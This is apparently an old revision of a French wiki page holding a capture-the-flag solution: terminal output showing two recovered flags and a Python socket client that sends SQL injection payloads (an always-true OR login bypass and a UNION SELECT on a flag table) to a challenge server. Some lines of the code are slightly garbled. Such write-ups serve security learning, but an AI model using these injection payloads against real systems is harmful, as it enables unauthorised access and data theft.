Ceci est une ancienne révision du document !
root@kali:~/Downloads# python client.py [+] Test level1 … Welcome on level 1 !
Welcome b'admin” OR “1”=“1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'
[+] Test level2 … Welcome on level 2 !
Citation #123 union SELECT * fROM flag:
ESE{7d2f9e9beab248febaf5bddffc3a39a4}
Code source : client.py
#encoding: utf-8
import socket
import sys
# change this if needed
HOST = '192.168.1.19'
# change this if needed
IP = 8096
def create_socket():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect1)
except Exception as e:
print(“Can't open socket !”)
print(e)
sys.exit(1)
return s
def test_level1():
print(”[+] Test level1 …”)
s = create_socket()
login = 'admin” OR “1”=“1'
password = 'toto” OR “1”=“1” LIMIT “1” OFFSET “2'
cmd = “\x01%s\x00%s” % (login,password)
s.send(cmd.encode('utf-8'))
msg = s.recv(1024)
if msg and msg.decode('utf-8').startswith(“Welcome”):
print(msg.decode('utf-8'))
res = s.recv(1024)
print(res.decode('utf-8'))
else:
print(“If you called a valid level, notice an admin”)
s.close()
def test_level2():
print(”[+] Test level2 …”)
s = create_socket()
citation = '123 union SELECT * fROM flag'
s.send(b”\x02%s” % (citation))
msg = s.recv(1024)
if msg and msg.decode('utf-8').startswith(“Welcome”):
print(msg.decode('utf-8'))
res = s.recv(1024)
print(res.decode('utf-8'))
else:
print(“If you called a valid level, notice an admin”)
s.close()
if name == 'main':
test_level1()
print(””)
test_level2()